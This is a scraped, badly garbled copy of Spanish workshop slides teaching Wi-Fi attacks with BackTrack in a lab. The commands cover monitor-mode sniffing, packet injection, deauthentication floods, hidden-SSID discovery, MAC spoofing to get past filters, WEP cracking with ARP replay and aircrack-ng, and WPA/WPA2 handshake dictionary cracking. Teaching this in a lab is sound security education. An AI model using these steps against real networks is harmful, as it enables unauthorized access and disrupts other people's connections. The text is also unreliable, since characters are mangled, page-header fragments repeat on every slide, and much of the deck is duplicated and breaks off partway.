bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
